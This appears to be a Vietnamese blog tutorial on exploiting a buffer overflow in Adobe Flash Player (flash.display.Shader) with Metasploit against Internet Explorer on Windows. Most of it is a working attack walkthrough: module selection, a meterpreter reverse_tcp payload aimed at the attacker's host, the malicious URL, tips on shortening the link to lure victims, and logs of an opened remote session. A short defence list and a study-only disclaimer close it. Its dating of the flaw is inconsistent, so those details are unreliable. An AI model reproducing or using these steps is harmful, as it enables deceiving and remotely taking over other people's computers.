Cách hack lỗ hỗng flash player

Trong bài này tôi sẽ hướng dẫn các bạn khai thác lỗ hổng tràn bộ đệm trong Adobe Flash Player. Lỗ hổng này xảy ra trong lớp flash.Display.Shader, khi thiết lập dữ liệu đặc biệt crafted như bytecode của nó, lỗ hổng được khai thác vào tháng 4 năm 2014, lỗ hổng này đã được thử nghiệm thành công trên IE 6 đến IE 11 với Flash 11, Flash 12Flash 13 trên Windows XP SP3, Windows 7 SP1 và Windows 8.

Hình thức tấn công giống với tấn công lỗ hổng Java các bạn xem bài trước của tôi. Sau đây tôi đi vào các bước khai thác chính của lỗ hổng này.

 Bước 1: Bật command gõ msfconsole. Sử dụng module exploit/windows/browser/adobe_flash_pixel_bender_bof


1
2
3
msf > use exploit/windows/browser/adobe_flash_pixel_bender_bof
msf exploit(adobe_flash_pixel_bender_bof) >
Bước 2: thiết lập option payload, lhost

1
2
3
4
5
msf exploit(adobe_flash_pixel_bender_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_pixel_bender_bof) > set lhost 10.0.0.131
lhost => 10.0.0.131
Bước 3:exploit. copy url chuyển sang máy victim

1
2
3
4
5
6
7
8
msf exploit(adobe_flash_pixel_bender_bof) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 10.0.0.131:4444
msf exploit(adobe_flash_pixel_bender_bof) > [*] Using URL: http://0.0.0.0:8080/ehBYUpuZJdfdqJC
[*]  Local IP: http://10.0.0.131:8080/ehBYUpuZJdfdqJC
[*] Server started.

Đây chính là đoạn url cần thực thi trên máy victim : http://10.0.0.131:8080/ehBYUpuZJdfdqJC . Các bạn có thể dùng các hình thức rút gọn link sao cho dễ dụ victim click hơn.

Bước 4: duyệt website trên máy nạn nhân

KHAI THÁC LỖ HỔNG ADOBE FLASH PLAYER, cách hack zero day adobe flash, hướng dẫn khai thác lỗ hỗng adobe flash, hack adobe flash kali linux, Cách hack lỗ hỗng flash player

KHAI THÁC LỖ HỔNG ADOBE FLASH PLAYER, cách hack zero day adobe flash, hướng dẫn khai thác lỗ hỗng adobe flash, hack adobe flash kali linux, Cách hack lỗ hỗng flash player
Bước 5: Quay lại máy của attacker chúng ta đã thấy meterpreter đang lắng nghe ở sessions 3
1
2
3
4
5
6
7
8
9
10
11
12
[*] 10.0.0.5         adobe_flash_pixel_bender_bof - Gathering target information.
[*] 10.0.0.5         adobe_flash_pixel_bender_bof - Sending response HTML.
[*] 10.0.0.5         adobe_flash_pixel_bender_bof - Request: /ehBYUpuZJdfdqJC/IzqXKB/
[*] 10.0.0.5         adobe_flash_pixel_bender_bof - Sending HTML...
[*] 10.0.0.5         adobe_flash_pixel_bender_bof - Request: /ehBYUpuZJdfdqJC/IzqXKB/ADcJw.swf
[*] 10.0.0.5         adobe_flash_pixel_bender_bof - Sending SWF...
[*] Sending stage (769536 bytes) to 10.0.0.5
[*] Meterpreter session 3 opened (10.0.0.131:4444 -> 10.0.0.5:49301) at 2014-08-26 06:31:38 -0400
[deprecated] I18n.enforce_available_locales will default to true in the future. If you really want to skip validation of your locale you can set I18n.enforce_available_locales = false to avoid this message.
msf exploit(adobe_flash_pixel_bender_bof)
Kết nối sessions -i 3 lấy thông tin của máy victim thông qua lệnh sysinfo.

1
2
3
4
5
6
7
8
9
10
11
msf exploit(adobe_flash_pixel_bender_bof) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > sysinfo
Computer        : CL02-W8
OS              : Windows 8.1 (Build 9600).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter >
Đến đây phần còn lại để dành cho các bạn. Đây là lỗ hổng bảo mật năm 2015 và tôi dự đoán sẽ là lỗ hổng được tấn công phổ biến nhất vào năm nay. Để phòng chống lỗ hổ này bằng cách :
  1. Sử dụng trình duyệt an toàn hơn IE
  2. Update flash lên phiên bản 14
Cám ơn các bạn đã theo dỗi bài viết của tôi. Bài viết mang mục đích học tập và nghiên cứu.
DMCA.com Protection Status
Nhãn :
Đăng Bởi :
Bình Luận

Đăng ký:Đăng Nhận xét (Atom)
Chat
1